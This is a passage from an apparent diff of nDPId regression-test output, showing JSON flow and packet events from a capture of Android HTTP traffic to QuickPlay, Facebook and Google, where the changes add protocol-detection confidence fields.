gT9tejpMASB7aKWvFhiu4QGNXLydSjpMCQRlAgvUiBR76vXzsijHkc0REdgd3XyrceLOzliJJ2YJiKyUJSxtC3GzyQMO4pSIp6ecHtaWgTAXcfOY+OAk4O4beielVRLRmAFYfy8QfnXrLZU3nBE0bVwqOr+6zJSmTPw\/pBMGYDkIj\/OO+PzHcmf4QMOCrf7ngerU6Yb0lCAkw02RDGeu89Fq6FRPClj27rijsplYpQbtM95TbKxttkXs6u9Th+Ix4oVjNzYCLPQBZXiEML\/xiiithq5ibtu690K7C7RtM9ibujqD7447J7UzpvxtTC+T6Mm\/R2Pjazsl391\/3tp2+3xOrWTaa1HPMfeTeZkjHKv9K+3tuzw+65QOa1TmUY2Zz07zlXG3mzaS233eddiY+yrf+u\/D3dDK0zF2LzCntfXv8GAAD\/\/wIMAEf8Fz+FEQAA"}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000031075,"flow_last_seen":1429000031075,"flow_idle_time":7440000,"flow_min_l4_payload_len":302,"flow_max_l4_payload_len":302,"flow_tot_l4_payload_len":302,"flow_avg_l4_payload_len":302,"midstream":1,"ts_msec":1429000031075,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.5.18","src_port":33064,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
 00854{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1429000031075,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":358,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":358,"pkt_l4_len":322,"ts_msec":1429000031075,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAVYEaUAAPwYE2wo2qfp4HAUSgSgAUG4ezi+GqNXzUBgAc8tUAABHRVQgL3NvbHIvUmVzdEFwaVNpbmdUZWxfUEgvcmVzdGFwaS9ob21lP2FwaUtleT1xd2VydHkmZGV2aWNlPWFuZHJvaWRtb2JpbGUmbG9jYWxlPWVuZyZuZXR3b3JrPVdJRkkmcGFnZU51bWJlcj0xJnBhZ2VTaXplPTUwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBEYWx2aWsvMS42LjAgKExpbnV4OyBVOyBBbmRyb2lkIDQuNC40OyBNSSAzVyBNSVVJL1Y2LjQuMi4wLktYRE1JQ0IpDQpIb3N0OiBhcGktc2luZ3RlbGhhd2sucXVpY2twbGF5LmNvbQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQoNCg=="}
-00938{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000031075,"flow_last_seen":1429000031075,"flow_idle_time":7440000,"flow_min_l4_payload_len":302,"flow_max_l4_payload_len":302,"flow_tot_l4_payload_len":302,"flow_avg_l4_payload_len":302,"midstream":1,"ts_msec":1429000031075,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.5.18","src_port":33064,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"api-singtelhawk.quickplay.com","url":"api-singtelhawk.quickplay.com\/solr\/RestApiSingTel_PH\/restapi\/home?apiKey=qwerty&device=androidmobile&locale=eng&network=WIFI&pageNumber=1&pageSize=50","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.2.0.KXDMICB)"}}
+00964{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000031075,"flow_last_seen":1429000031075,"flow_idle_time":7440000,"flow_min_l4_payload_len":302,"flow_max_l4_payload_len":302,"flow_tot_l4_payload_len":302,"flow_avg_l4_payload_len":302,"midstream":1,"ts_msec":1429000031075,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.5.18","src_port":33064,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"api-singtelhawk.quickplay.com","url":"api-singtelhawk.quickplay.com\/solr\/RestApiSingTel_PH\/restapi\/home?apiKey=qwerty&device=androidmobile&locale=eng&network=WIFI&pageNumber=1&pageSize=50","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.2.0.KXDMICB)"}}
 00530{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1429000031382,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":109,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":109,"pkt_l4_len":73,"ts_msec":1429000031382,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAF1lCkAArQY3FngcBRIKNqn6AFCBKIapX\/duHs9dUBgIImd7AAD+6U1rdHX+8GWHmWHKf1z0+O1Nfp++87\/dVNV0wP\/9v\/+n\/\/6\/AAAA\/\/8CDAD1QSSgppQFAA=="}
 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000031698,"flow_last_seen":1429000031698,"flow_idle_time":7440000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":187,"midstream":1,"ts_msec":1429000031698,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"173.252.74.22","src_port":52285,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
 00699{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1429000031698,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":243,"pkt_l4_len":207,"ts_msec":1429000031698,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAOOYfEAAPwb2VQo2qfqt\/EoWzD0AUOQgUs9KX9ElUBgAc0k5AABHRVQgL21vYmlsZS9zdGF0dXMucGhwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBEYWx2aWsvMS42LjAgKExpbnV4OyBVOyBBbmRyb2lkIDQuNC40OyBNSSAzVyBNSVVJL1Y2LjQuMi4wLktYRE1JQ0IpDQpIb3N0OiB3d3cuZmFjZWJvb2suY29tDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANCg0K"}
-00816{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000031698,"flow_last_seen":1429000031698,"flow_idle_time":7440000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":187,"midstream":1,"ts_msec":1429000031698,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"173.252.74.22","src_port":52285,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"www.facebook.com","url":"www.facebook.com\/mobile\/status.php","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.2.0.KXDMICB)"}}
+00842{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000031698,"flow_last_seen":1429000031698,"flow_idle_time":7440000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":187,"midstream":1,"ts_msec":1429000031698,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"173.252.74.22","src_port":52285,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"www.facebook.com","url":"www.facebook.com\/mobile\/status.php","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.2.0.KXDMICB)"}}
 00827{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1429000032158,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":339,"pkt_l4_len":303,"ts_msec":1429000032158,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAUNiNkAArAa\/H638ShYKNqn6AFDMPUpf0SXkIFOKUBgIIjgwAABIVFRQLzEuMSAyMDQgTm8gQ29udGVudA0KQ2FjaGUtQ29udHJvbDogcHJpdmF0ZSwgbm8tc3RvcmUsIG5vLWNhY2hlLCBtdXN0LXJldmFsaWRhdGUNCkVkZ2UtY29udHJvbDogY2FjaGUtbWF4YWdlPTI4ZA0KWC1GQi1EZWJ1ZzogK2R4S1lRRnpNRHhKdjZkUXFVLyt4Yzd1VXVxaHpOK3BWYXpxSzdCUmswUW1oSWIxVEp3YXZ4SDRpUUV1TUVFSDVZdU80TU11R3ErWHlyOGUveHZqV2c9PQ0KRGF0ZTogVHVlLCAxNCBBcHIgMjAxNSAwODoyNzoxMiBHTVQNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCg0K"}
 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000037314,"flow_last_seen":1429000037314,"flow_idle_time":7440000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":187,"midstream":1,"ts_msec":1429000037314,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"173.252.74.22","src_port":52288,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
 00699{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1429000037314,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":243,"pkt_l4_len":207,"ts_msec":1429000037314,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAONYlEAAPwY2Pgo2qfqt\/EoWzEAAUKq8lHZkd0MeUBg5CHxNAABHRVQgL21vYmlsZS9zdGF0dXMucGhwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBEYWx2aWsvMS42LjAgKExpbnV4OyBVOyBBbmRyb2lkIDQuNC40OyBNSSAzVyBNSVVJL1Y2LjQuMi4wLktYRE1JQ0IpDQpIb3N0OiB3d3cuZmFjZWJvb2suY29tDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANCg0K"}
-00816{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000037314,"flow_last_seen":1429000037314,"flow_idle_time":7440000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":187,"midstream":1,"ts_msec":1429000037314,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"173.252.74.22","src_port":52288,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"www.facebook.com","url":"www.facebook.com\/mobile\/status.php","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.2.0.KXDMICB)"}}
+00842{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000037314,"flow_last_seen":1429000037314,"flow_idle_time":7440000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":187,"midstream":1,"ts_msec":1429000037314,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"173.252.74.22","src_port":52288,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"www.facebook.com","url":"www.facebook.com\/mobile\/status.php","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.2.0.KXDMICB)"}}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000037600,"flow_last_seen":1429000037600,"flow_idle_time":7440000,"flow_min_l4_payload_len":185,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":185,"midstream":1,"ts_msec":1429000037600,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.26.231","src_port":33277,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
 00699{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1429000037600,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":241,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":241,"pkt_l4_len":205,"ts_msec":1429000037600,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAOEBz0AAPwbyFAo2qfp4HBrngf0AUJlyzTdc8IHSUBgAc3meAABHRVQgL2dlbmVyYXRlXzIwNCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogRGFsdmlrLzEuNi4wIChMaW51eDsgVTsgQW5kcm9pZCA0LjQuNDsgTUkgM1cgTUlVSS9WNi40LjIuMC5LWERNSUNCKQ0KSG9zdDogY2xpZW50czMuZ29vZ2xlLmNvbQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQoNCg=="}
-00812{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000037600,"flow_last_seen":1429000037600,"flow_idle_time":7440000,"flow_min_l4_payload_len":185,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":185,"midstream":1,"ts_msec":1429000037600,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.26.231","src_port":33277,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {"hostname":"clients3.google.com","url":"clients3.google.com\/generate_204","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.2.0.KXDMICB)"}}
+00838{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000037600,"flow_last_seen":1429000037600,"flow_idle_time":7440000,"flow_min_l4_payload_len":185,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":185,"midstream":1,"ts_msec":1429000037600,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.26.231","src_port":33277,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {"hostname":"clients3.google.com","url":"clients3.google.com\/generate_204","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.2.0.KXDMICB)"}}
 00560{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1429000037659,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":137,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":137,"pkt_l4_len":101,"ts_msec":1429000037659,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAHlLmEAArQY6l3gcGucKNqn6AFCB\/VzwgdKZcs3wUBgIIqKRAABIVFRQLzEuMSAyMDQgTm8gQ29udGVudA0KRGF0ZTogVHVlLCAxNCBBcHIgMjAxNSAwODoyNzoxNyBHTVQNClNlcnZlcjogR0ZFLzIuMA0KDQo="}
 00829{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1429000037771,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":339,"pkt_l4_len":303,"ts_msec":1429000037771,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAUMgAkAArQYAVK38ShYKNqn6AFDMQGR3Qx6qvJUxUBj\/\/2USAABIVFRQLzEuMSAyMDQgTm8gQ29udGVudA0KQ2FjaGUtQ29udHJvbDogcHJpdmF0ZSwgbm8tc3RvcmUsIG5vLWNhY2hlLCBtdXN0LXJldmFsaWRhdGUNCkVkZ2UtY29udHJvbDogY2FjaGUtbWF4YWdlPTI4ZA0KWC1GQi1EZWJ1ZzogSENQcUMxYW5HZGxXZUVqMEIwU3F1MHVIQzU2N3BTRzJERlZvSXdHYmRXNFovN1dydjVhM0ZQZEY5V1FIMDUrNFREZVFXV3FiZjA4djA4c1RURE81VWc9PQ0KRGF0ZTogVHVlLCAxNCBBcHIgMjAxNSAwODoyNzoxNyBHTVQNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCg0K"}
 00864{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1429000039509,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":365,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":365,"pkt_l4_len":329,"ts_msec":1429000039509,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAV1DA0AAPwaoIgo2qfp4HCMpxewAUEHDig\/6xw2tUBgAhzcPAABHRVQgL3NvbHIvUmVzdEFwaVNpbmdUZWxfUEgvcmVzdGFwaS9tb3ZpZXMvNjI0MT9hcGlLZXk9cXdlcnR5JmRldmljZT1hbmRyb2lkbW9iaWxlJmxvY2FsZT1lbmcmbmV0d29yaz1XSUZJJnBhZ2VOdW1iZXI9MSZwYWdlU2l6ZT01MCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogRGFsdmlrLzEuNi4wIChMaW51eDsgVTsgQW5kcm9pZCA0LjQuNDsgTUkgM1cgTUlVSS9WNi40LjIuMC5LWERNSUNCKQ0KSG9zdDogYXBpLXNpbmd0ZWxoYXdrLnF1aWNrcGxheS5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo="}
 01012{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1429000039809,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":476,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":476,"pkt_l4_len":440,"ts_msec":1429000039809,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAcw50kAAPwaw5Ao2qfp4HCMpxe0AUOei9TYRmPaxUBgAh2m5AABHRVQgL3NvbHIvUmVzdEFwaVNpbmdUZWxfUEgvcmVzdGFwaS9tb3JlTGlrZVRoaXM\/YXBpS2V5PXF3ZXJ0eSZjb250ZW50UmF0aW5nPTIwJmRldmljZT1hbmRyb2lkbW9iaWxlJmdlbnJlPSUyOFRocmlsbGVyK0FjdGlvbkFkdmVudHVyZSslMjkmbGFuZ3VhZ2U9JTI4ZW5nKyUyOSZsb2NhbGU9ZW5nJm5ldHdvcms9V0lGSSZwYWdlTnVtYmVyPTEmcGFnZVNpemU9NTAmcmVzb3VyY2VJZD02MjQxJnJlc291cmNlVHlwZT1tb3ZpZSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogRGFsdmlrLzEuNi4wIChMaW51eDsgVTsgQW5kcm9pZCA0LjQuNDsgTUkgM1cgTUlVSS9WNi40LjIuMC5LWERNSUNCKQ0KSG9zdDogYXBpLXNpbmd0ZWxoYXdrLnF1aWNrcGxheS5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo="}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000041481,"flow_last_seen":1429000041481,"flow_idle_time":7440000,"flow_min_l4_payload_len":181,"flow_max_l4_payload_len":181,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":181,"midstream":1,"ts_msec":1429000041481,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"31.13.68.49","src_port":44793,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
 00691{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1429000041481,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":237,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":237,"pkt_l4_len":201,"ts_msec":1429000041481,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAN24s0AAQAZp+Qo2qfofDUQxrvkAUHO25ZtSV776UBgBtoUeAABHRVQgL21vYmlsZS9zdGF0dXMucGhwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBEYWx2aWsvMS42LjAgKExpbnV4OyBVOyBBbmRyb2lkIDQuNC4yOyBHVC1JOTUwNSBCdWlsZC9LT1Q0OUgpDQpIb3N0OiB3d3cuZmFjZWJvb2suY29tDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANCg0K"}
-00809{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000041481,"flow_last_seen":1429000041481,"flow_idle_time":7440000,"flow_min_l4_payload_len":181,"flow_max_l4_payload_len":181,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":181,"midstream":1,"ts_msec":1429000041481,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"31.13.68.49","src_port":44793,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"www.facebook.com","url":"www.facebook.com\/mobile\/status.php","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.2; GT-I9505 Build\/KOT49H)"}}
+00835{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000041481,"flow_last_seen":1429000041481,"flow_idle_time":7440000,"flow_min_l4_payload_len":181,"flow_max_l4_payload_len":181,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":181,"midstream":1,"ts_msec":1429000041481,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"31.13.68.49","src_port":44793,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"www.facebook.com","url":"www.facebook.com\/mobile\/status.php","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.2; GT-I9505 Build\/KOT49H)"}}
 00827{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1429000041819,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":339,"pkt_l4_len":303,"ts_msec":1429000041819,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAUNnpEAArQZNhh8NRDEKNqn6AFCu+VJXvvpztuZQUBgIIrdJAABIVFRQLzEuMSAyMDQgTm8gQ29udGVudA0KQ2FjaGUtQ29udHJvbDogcHJpdmF0ZSwgbm8tc3RvcmUsIG5vLWNhY2hlLCBtdXN0LXJldmFsaWRhdGUNCkVkZ2UtY29udHJvbDogY2FjaGUtbWF4YWdlPTI4ZA0KWC1GQi1EZWJ1ZzogajRyR1VwRDFrR0J2VWIvajBNRVhMMnlyRzg0NlVLcDBDV2hLNFFWcTB4K0hLUDR5UVIxR09sVWtXUFkvRGJKNnNKU1pTSWdIdGF1L04xQjF2cTNteXc9PQ0KRGF0ZTogVHVlLCAxNCBBcHIgMjAxNSAwODoyNzoyMSBHTVQNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCg0K"}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000048159,"flow_last_seen":1429000048159,"flow_idle_time":7440000,"flow_min_l4_payload_len":487,"flow_max_l4_payload_len":487,"flow_tot_l4_payload_len":487,"flow_avg_l4_payload_len":487,"midstream":1,"ts_msec":1429000048159,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.5.41","src_port":44256,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
 01101{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1429000048159,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":543,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":543,"pkt_l4_len":507,"ts_msec":1429000048159,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAg\/pGUAAPwYfWgo2qfp4HAUprOAAUG\/tOAJjh+GeUBg5CMy9AABHRVQgL3ZzdGIvcGxheWxpc3RfNV82MjQxXzM1Ny5tM3U4P2FjdGlvbj0xNDUmYXBwSWQ9NTAwNiZjYXJyaWVySWQ9MjMmYXBwVmVyc2lvbj0xLjAmY29udGVudElkPTYyNDEmY29udGVudFR5cGVJZD0zJmRldmljZU5hbWU9YW5kcm9pZG1vYmlsZSZlbmNvZGluZ0lkPTM1NyZkcm1JZD00JmRybVZlcnNpb249MS41JmRlbGl2ZXJ5PTUmcHJlZkxhbmd1YWdlPWVuZyZ3ZWJ2dHQ9dHJ1ZSZ1c2VyaWQ9MDkxNTQ5NzQ1MzYmdnN0YnR5cGU9c3RyZWFtaW5nIEhUVFAvMS4xDQpIb3N0OiBwbGF5LXNpbmd0ZWxoYXdrLnF1aWNrcGxheS5jb20NCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChMaW51eDsgQW5kcm9pZCA0LjQuNDsgTUkgM1cgQnVpbGQvS1RVODRQKSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBWZXJzaW9uLzQuMCBDaHJvbWUvMzMuMC4wLjAgTW9iaWxlIFNhZmFyaS81MzcuMzYNCg0K"}
